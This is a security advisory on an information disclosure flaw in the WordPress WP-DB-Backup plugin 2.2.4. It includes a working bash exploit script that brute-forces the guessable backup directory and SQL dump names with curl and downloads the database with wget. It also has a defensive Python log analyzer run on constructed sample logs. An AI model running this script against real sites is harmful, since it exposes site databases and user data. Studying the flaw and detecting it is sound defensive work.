WordPress WP-DB-Backup Plugin 'wp-db-backup.php' Remote Information Disclosure Vulnerability

Published: 2014-11-19
Updated: 2014-11-21

Affected systems:
WordPress WP-DB-Backup 2.2.4
WordPress WP-DB-Backup
Description:
BUGTRAQ ID: 71177

The WP-DB-Backup plugin backs up the core WordPress database tables.

WP-DB-Backup 2.2.4 and other versions contain a remote information disclosure vulnerability in their implementation: as the test script below shows, the backup directory under wp-content/ and the name of the SQL dump inside it are guessable, so a remote attacker can exploit this to obtain sensitive information.

Source: Larry Cashdollar

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/bin/bash
# Larry W. Cashdollar, @_larry0
# http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
# Usage: compile raintable.c first
#   gcc raintable.c -o table; ./table > rainbow
# Then run: ./exp targetsite date
# date is in the format YYYYMMDD, e.g. 20141031

# Phase 1: locate the backup directory by trying every candidate name in the
# precomputed "rainbow" list. A hit is cached in found.txt so later runs skip this step.
if [ ! -e found.txt ]; then
    Z=0
    K=`wc -l rainbow | awk '{print $1}'`
    echo "[+] Searching...."
    for x in `cat rainbow`; do
        CPATH="http://$1/wp-content/backup-$x/"
        RESULT=`curl -s --head "$CPATH" | grep 200`
        if [ -n "$RESULT" ]; then
            echo "[+] Location $CPATH Found"
            echo "[+] Received $RESULT"
            echo "$x" > found.txt
            exit   # break here
        fi
        echo -n "Percent Done: "
        Y=`echo "scale=6;($Z/$K)*100" | bc`
        echo -n "$Y"
        echo "%"
        Z=$(( Z + 1 ))
    done
    # Reached only when no candidate matched; do not continue with a bogus name.
    echo "[-] Backup directory not found"
    exit 1
else
    x=`cat found.txt`
fi

# Phase 2: with the directory known, try the sequential suffix 000-999 of the
# backup file name wordpress_wp_<YYYYMMDD>_<nnn>.sql and fetch the first hit.
Z=0     # reset the progress counter for this loop
K=999
for y in `seq -w 0 999`; do
    CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"
    RESULT=`curl -s --head "$CPATH" | grep 200`
    if [ -n "$RESULT" ]; then
        echo "[+] Database backup $CPATH Found"
        echo "[+] Received $RESULT"
        wget "$CPATH"
        exit   # break here
    fi
    echo -n "Percent Done: "
    Y=`echo "scale=2;($Z/$K)*100" | bc`
    echo -n "$Y"
    echo "%"
    Z=$(( Z + 1 ))
done
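From the defender's side, here is an added example (not part of the original advisory or Larry Cashdollar's script) of what the enumeration above looks like in a web server access log and how to flag it: a Python function that counts requests to /wp-content/backup-<name>/ paths per client IP and reports any client that probed repeatedly or got a 200 on a backup path. The log lines are constructed samples, and the probe threshold and path pattern are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not real traffic):
# one client hammers /wp-content/backup-<name>/ with HEAD requests, gets a 200
# on the right name, then downloads the wordpress_wp_<date>_<nnn>.sql dump.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Nov/2014:10:00:01 +0000] "HEAD /wp-content/backup-a1b2c/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:02 +0000] "HEAD /wp-content/backup-a1b2d/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:03 +0000] "HEAD /wp-content/backup-a1b2e/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:04 +0000] "HEAD /wp-content/backup-a1b2f/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:05 +0000] "HEAD /wp-content/backup-a1b30/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:06 +0000] "HEAD /wp-content/backup-a1b31/ HTTP/1.1" 404 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:07 +0000] "HEAD /wp-content/backup-f3e2d/ HTTP/1.1" 200 0 "-" "curl/7.30.0"
203.0.113.5 - - [19/Nov/2014:10:00:08 +0000] "GET /wp-content/backup-f3e2d/wordpress_wp_20141031_042.sql HTTP/1.1" 200 51234 "-" "Wget/1.15"
198.51.100.7 - - [19/Nov/2014:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Any path under the plugin's backup directory: the directory probe itself or a file in it (assumed pattern).
BACKUP_PATH_RE = re.compile(r'^/wp-content/backup-[^/]+/')

def analyze(log_text, threshold=5):
    """Per client IP, count requests to backup-* paths, how many missed (404),
    and which ones succeeded (200). A client is reported when it made at least
    `threshold` probes (assumed value) or had any successful hit."""
    stats = defaultdict(lambda: {"probes": 0, "misses": 0, "hits": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not BACKUP_PATH_RE.match(m["path"]):
            continue
        s = stats[m["ip"]]
        s["probes"] += 1
        if m["status"] == "404":
            s["misses"] += 1
        elif m["status"] == "200":
            s["hits"].append(m["path"])
    return {ip: s for ip, s in stats.items() if s["probes"] >= threshold or s["hits"]}

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} probes, {s['misses']} misses, hits: {s['hits']}")
```

A single 200 on a backup-* path is worth alerting on by itself, since a legitimate visitor has no reason to request that directory.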

Recommendation:
Vendor patch:

WordPress
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software keep an eye on the vendor's homepage for the latest version:

https://wordpress.org/plugins/wp-db-backup/

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.